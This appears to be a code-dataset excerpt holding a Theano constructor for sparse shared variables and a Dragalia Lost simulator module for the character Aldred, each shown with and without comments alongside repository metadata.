class SparseTensorSharedVariable(_sparse_py_operators, SharedVariable):
dtype = property(lambda self: self.type.dtype)
format = property(lambda self: self.type.format)
@shared_constructor
def sparse_constructor(value, name=None, strict=False, allow_downcast=None,
borrow=False, format=None):
"""
SharedVariable Constructor for SparseType.
writeme
"""
if not isinstance(value, scipy.sparse.spmatrix):
        raise TypeError("Expected a sparse matrix in the sparse shared "
                        "variable constructor. Received: %s" % value.__class__)
if format is None:
format = value.format
type = SparseType(format=format, dtype=value.dtype)
if not borrow:
value = copy.deepcopy(value)
return SparseTensorSharedVariable(type=type, value=value, name=name,
strict=strict, allow_downcast=allow_downcast)
| 34.878788
| 105
| 0.709818
|
from __future__ import absolute_import, print_function, division
import copy
import scipy.sparse
from theano.compile import shared_constructor, SharedVariable
from theano.sparse.basic import SparseType, _sparse_py_operators
class SparseTensorSharedVariable(_sparse_py_operators, SharedVariable):
dtype = property(lambda self: self.type.dtype)
format = property(lambda self: self.type.format)
@shared_constructor
def sparse_constructor(value, name=None, strict=False, allow_downcast=None,
borrow=False, format=None):
if not isinstance(value, scipy.sparse.spmatrix):
        raise TypeError("Expected a sparse matrix in the sparse shared "
                        "variable constructor. Received: %s" % value.__class__)
if format is None:
format = value.format
type = SparseType(format=format, dtype=value.dtype)
if not borrow:
value = copy.deepcopy(value)
return SparseTensorSharedVariable(type=type, value=value, name=name,
strict=strict, allow_downcast=allow_downcast)
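A minimal usage sketch, assuming Theano and SciPy are installed; theano.shared
dispatches SciPy sparse inputs to the constructor above:

import numpy as np
import scipy.sparse
import theano

m = scipy.sparse.csr_matrix(np.eye(3, dtype="float64"))
x = theano.shared(m, name="x")  # a SparseTensorSharedVariable
print(x.format, x.dtype)        # csr float64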
| true
| true
|
f70b82a48614719ef93b9151d17a35ed981f6a36
| 3,177
|
py
|
Python
|
adv/aldred.py
|
6tennis/dl
|
69eb7e71da9fabe9e7ec40c461b525b4f967f345
|
[
"Apache-2.0"
] | null | null | null |
adv/aldred.py
|
6tennis/dl
|
69eb7e71da9fabe9e7ec40c461b525b4f967f345
|
[
"Apache-2.0"
] | null | null | null |
adv/aldred.py
|
6tennis/dl
|
69eb7e71da9fabe9e7ec40c461b525b4f967f345
|
[
"Apache-2.0"
] | null | null | null |
from core.advbase import *
from slot.a import *
def module():
return Aldred
class Aldred(Adv):
comment = 'maintain dragondrive'
conf = {}
conf['slots.a'] = Heralds_of_Hinomoto()+Dear_Diary()
conf['slots.poison.a'] = Heralds_of_Hinomoto()+The_Plaguebringer()
conf['acl'] = """
`s3, not self.s3_buff
`s2
`dragon, not self.dragondrive_buff.get()
`s1, x=5
"""
coab = ['Wand','Berserker','Curran']
def prerun(self):
self.dragondrive_buff = Selfbuff('dragondrive', 0.30, -1, 's', 'passive')
self.dragonform.set_dragondrive(self.dragondrive_buff)
self.a3_str = Modifier('a3', 'att', 'passive', 0.20)
        self.s2_str = Selfbuff('s2', 0.20, -1, 'att', 'buff')  # does not proc doublebuff
self.s2_tick = Timer(self.s2_degen, 2.9, 1)
self.s2_stuff_timer = Timer(self.s2_stuff_off)
self.s2_on = False
self.hp = 100
self.conf.x1.utp = 120
self.conf.x2.utp = 120
self.conf.x3.utp = 120
self.conf.x4.utp = 180
self.conf.x5.utp = 180
def d_slots(self):
if self.duration <= 60:
self.conf['slots.a'] = The_Chocolatiers()+TL()
self.conf['slots.poison.a'] = The_Chocolatiers()+The_Plaguebringer()
def x_proc(self, e):
if self.dragondrive_buff.get():
try:
utp = self.conf[e.name].utp
self.dragonform.charge_gauge(utp, utp=True)
            except Exception:  # skip attacks without a utp entry
                pass
def s1_proc(self, e):
if self.dragondrive_buff.get():
with CrisisModifier('s1', 1.00, self.hp):
self.dmg_make('s1', 2.42*4)
self.dragonform.add_drive_gauge_time(self.s1.ac.getstartup()+self.s1.ac.getrecovery(), skill_pause=True)
self.dragonform.charge_gauge(-750, utp=True)
self.s1.charge(self.sp_convert(0.50, self.conf.s1.sp))
else:
self.dmg_make('s1', 2.42*4)
# 242 * 4 mod, 4 hits, 2.4s
# 242 * 4 w/ 2x crisis
# -750 dd points
# +50% skill gauge
# 2.1666667461395264
def s2_proc(self, e):
if self.dragondrive_buff.get():
self.s2_stuff_on()
self.s2_stuff_timer.on(40 * self.mod('bt'))
self.dragonform.add_drive_gauge_time(self.s2.ac.getstartup()+self.s2.ac.getrecovery(), skill_pause=True)
self.dragonform.charge_gauge(3000, utp=True)
else:
self.dragonform.charge_gauge(1200, utp=True)
# 1 hp loss = 1 gauge gain, will assume 3000 max hp here
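            # e.g. entering at full hp: 3000 * (100 - 30) / 100 = 2100 gauge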
if self.hp > 30:
self.dragonform.charge_gauge(3000 * (self.hp-30)/100, utp=True)
self.hp = 30
# +1200 dd points
# 1.3333333730697632s
def s2_stuff_on(self):
self.a3_str.on()
self.s2_str.on()
self.s2_tick.on()
def s2_stuff_off(self, t):
self.a3_str.off()
self.s2_str.off()
self.s2_tick.off()
def s2_degen(self, t):
self.hp = max(self.hp-6, 0)
if __name__ == '__main__':
    import sys  # not guaranteed to be pulled in by the star imports above
    from core.simulate import test_with_argv
    test_with_argv(None, *sys.argv)
| 33.09375
| 116
| 0.575071
|
from core.advbase import *
from slot.a import *
def module():
return Aldred
class Aldred(Adv):
comment = 'maintain dragondrive'
conf = {}
conf['slots.a'] = Heralds_of_Hinomoto()+Dear_Diary()
conf['slots.poison.a'] = Heralds_of_Hinomoto()+The_Plaguebringer()
conf['acl'] = """
`s3, not self.s3_buff
`s2
`dragon, not self.dragondrive_buff.get()
`s1, x=5
"""
coab = ['Wand','Berserker','Curran']
def prerun(self):
self.dragondrive_buff = Selfbuff('dragondrive', 0.30, -1, 's', 'passive')
self.dragonform.set_dragondrive(self.dragondrive_buff)
self.a3_str = Modifier('a3', 'att', 'passive', 0.20)
self.s2_str = Selfbuff('s2', 0.20, -1, 'att', 'buff')
self.s2_tick = Timer(self.s2_degen, 2.9, 1)
self.s2_stuff_timer = Timer(self.s2_stuff_off)
self.s2_on = False
self.hp = 100
self.conf.x1.utp = 120
self.conf.x2.utp = 120
self.conf.x3.utp = 120
self.conf.x4.utp = 180
self.conf.x5.utp = 180
def d_slots(self):
if self.duration <= 60:
self.conf['slots.a'] = The_Chocolatiers()+TL()
self.conf['slots.poison.a'] = The_Chocolatiers()+The_Plaguebringer()
def x_proc(self, e):
if self.dragondrive_buff.get():
try:
utp = self.conf[e.name].utp
self.dragonform.charge_gauge(utp, utp=True)
            except Exception:
                pass
def s1_proc(self, e):
if self.dragondrive_buff.get():
with CrisisModifier('s1', 1.00, self.hp):
self.dmg_make('s1', 2.42*4)
self.dragonform.add_drive_gauge_time(self.s1.ac.getstartup()+self.s1.ac.getrecovery(), skill_pause=True)
self.dragonform.charge_gauge(-750, utp=True)
self.s1.charge(self.sp_convert(0.50, self.conf.s1.sp))
else:
self.dmg_make('s1', 2.42*4)
def s2_proc(self, e):
if self.dragondrive_buff.get():
self.s2_stuff_on()
self.s2_stuff_timer.on(40 * self.mod('bt'))
self.dragonform.add_drive_gauge_time(self.s2.ac.getstartup()+self.s2.ac.getrecovery(), skill_pause=True)
self.dragonform.charge_gauge(3000, utp=True)
else:
self.dragonform.charge_gauge(1200, utp=True)
if self.hp > 30:
self.dragonform.charge_gauge(3000 * (self.hp-30)/100, utp=True)
self.hp = 30
def s2_stuff_on(self):
self.a3_str.on()
self.s2_str.on()
self.s2_tick.on()
def s2_stuff_off(self, t):
self.a3_str.off()
self.s2_str.off()
self.s2_tick.off()
def s2_degen(self, t):
self.hp = max(self.hp-6, 0)
if __name__ == '__main__':
    import sys
    from core.simulate import test_with_argv
    test_with_argv(None, *sys.argv)
| true
| true
|